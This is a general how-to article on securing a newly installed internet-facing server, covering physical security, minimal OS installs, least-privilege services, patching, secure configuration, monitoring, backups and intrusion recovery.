Installing a server is something a lot of people undertake today. Whether you’re a student, administrator or IT professional, it is very likely that one day or another you’ll need to install a server which will be exposed to the internet.
There are many types of servers, from Web Servers to Mail Servers to Forums and each one of these will require some planning before being deployed on the Internet. If one doesn’t take the necessary precautions he might be opening his internal network to intrusions. So what can one do to ensure their server is as safe as possible?
The first layer of a server is the hardware
- Keep in mind where this server is going be stored and who will have access to it as well as it’s the network pipe . If you’re a small company and everyone including the email server is on the same network segment, it’s possible that someone could run a network sniffer and capture everyone’s emails. Keep this in mind when deciding how to wire your network.
- Another consideration is physical security. Attacks do not exclusively originate from the outside. A disgruntled employee with physical access to the server (even if he doesn’t have login credentials) could potentially install a Trojan which can steal valuable data such as credit card information on the company’s online ordering system.
The second layer of a server is the operating system. Be it a Windows-based server or a Linux-based server the underlying steps are the same.
- When installing the operating system ensure you only install components that you will need. Do not install an FTP server if you don’t intend to use it.
- Ensure every service runs under its own user and make sure none of these have administrative rights. Running a service with administrator rights will mean a hacker would have total system access if he manages to compromise that service.
- Double check the server’s user list. Ensure that there are no unneeded users, that the passwords for the system’s active users are secure and follow best practices.
- Make sure the server is fully patched before it is hooked to the internet.
- Make sure you plan how you will be monitoring the server once it goes live.
The final layer of our new server will be the software running on it and its corresponding configuration.
- Ensure the server is configured securely. One can find plenty of guides online describing how to securely configure nearly any type of server imaginable, it’s good practice to follow these.
- Once a server is installed securely, the administrator’s responsibility doesn’t end there. You need to be mindful of what it is running and what might be installed in the future. This is especially true for web servers. Scripts might make your secure server wide open just as much as a badly configured one, thus it is essential that the administrator keeps a watchful eye on what gets deployed on his server in the future.
- Make sure the server does not advertise to the world what software it is running and what versions. Some servers are configured by default to display via banners this information when a client opens a connection to them. This can be valuable information to an attacker who might be scanning for particular versions of software for which he has exploits.
- Ensure that 3rd party add-ons are securely configured as well.
- Test any content you put on your servers. This one is especially true for web servers. Even if you install a 3rd party web application which you paid a lot of money for it is essential to test that application for the usual attacks such as cross site scripting and SQL injection.
- Regularly monitor logs of your software to ensure that is running securely and hasn’t been compromised.
For new administrators or anyone installing a server for the first time the biggest threat is perhaps fear. It is understandable that the first target for anyone installing a server is to get it working. At times this can take a bit of work to get it just right and as such once this target is achieved the temptation to leave the newly setup server alone might be great. Do not allow your fear of possibly breaking the new server to stop you from properly securing it.
If possible keep an identical server with identical setup available at all times so that whenever patches to the system/software are released these can be tested properly on the test server before being deployed on the live system. This can help avoid downtime in case the patch causes issues with your server setup
Actively monitor your server. If your server is directly connected to the internet it is guaranteed to receive multiple attacks daily. If any of these succeed it is important to find out as early as possible and take corrective action before the hacker is allowed to further compromise the system.
Keep periodic incremental backups of your server. Backups are essential as they can help you quickly recover from both hardware failure and even intrusions.
If you server suffers an intrusion the best approach would be to disconnect it, investigate how the intruder gained access, restore the latest backup (don’t trust your system after an intrusion, the intruder could have installed software and changed system tools to easily compromise your system in the future) and plug the hole that the intruder used, before reconnecting the system back to the internet.